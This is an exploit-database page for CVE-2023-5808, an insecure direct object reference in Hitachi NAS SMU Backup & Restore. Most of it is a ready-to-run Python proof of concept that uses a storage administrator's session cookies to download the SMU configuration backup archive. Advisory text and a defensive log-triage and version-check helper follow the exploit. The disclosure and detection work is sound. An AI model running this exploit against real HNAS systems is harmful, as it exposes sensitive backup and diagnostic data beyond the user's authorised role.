Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference

Hitachi NAS SMU Backup and Restore versions prior to 14.8.7825.01 suffer from an insecure direct object reference vulnerability.

Packet Storm
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
# CVE:              CVE-2023-5808
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04

import argparse
from datetime import datetime
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-5808 PoC",
    usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso):
    # Set the filename:
    filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso)

Related news

CVE-2023-5808: Hitachi Vantara Support

Information disclosure in SMU in Hitachi Vantara HNAS 14.8.7825.01 on Windows allows authenticated users to download sensitive files via Insecure Direct Object Reference (IDOR).

CVE-2023-5808

SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data that would normally be barred to that specific administrative role.
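A defender-side triage helper for the issue described above, as an added example that is not part of the advisory or the published PoC: it checks an SMU version string against the fixed release and hunts web access logs for successful requests to the backup screen path. The function names, the Common Log Format layout and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

FIXED = (14, 8, 7825, 1)  # first fixed SMU release on the page: 14.8.7825.01
# Backup screen path from the PoC, URL-decoded and lower-cased for matching.
BACKUP_PATH = "/mgr/app/template/simple,backupsmuscreen.vm"

# Assumption: Common Log Format (host ident user [time] "request" status bytes).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def is_vulnerable(version):
    """True when a dotted SMU version sorts before 14.8.7825.01."""
    return tuple(int(part) for part in version.strip().split(".")) < FIXED

def find_backup_requests(lines):
    """Return successful (2xx) requests for the SMU backup screen."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # line is not in the assumed format
        # Decode first so %2C, %2c and a literal comma compare equal.
        path = unquote(m["uri"].split("?", 1)[0]).lower()
        if path.startswith(BACKUP_PATH) and m["status"].startswith("2"):
            size = 0 if m["size"] == "-" else int(m["size"])
            hits.append({"src": m["src"], "user": m["user"],
                         "time": m["ts"], "bytes": size})
    return hits

# Constructed sample lines, not taken from a real SMU.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2023:10:01:22 +0000] "GET /mgr/app/template/simple%2CBackupSmuScreen.vm/password/ HTTP/1.1" 200 1048576',
    '10.0.0.9 - - [13/Dec/2023:10:02:10 +0000] "GET /mgr/app/template/simple,BackupSmuScreen.vm/password/ HTTP/1.1" 403 512',
    '10.0.0.7 - - [13/Dec/2023:10:03:00 +0000] "GET /mgr/app/template/simple%2cbackupsmuscreen.vm/password/ HTTP/1.1" 200 2048',
    '10.0.0.5 - - [13/Dec/2023:10:04:00 +0000] "POST /mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for version in ("13.9.7021.04", "14.8.7825.01"):
        print(version, "vulnerable" if is_vulnerable(version) else "fixed")
    for hit in find_backup_requests(SAMPLE_LOG):
        print(hit)
```

Access logs do not record the requester's administrative role, so each hit still has to be correlated with the session's account to decide whether that role was entitled to the backup.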
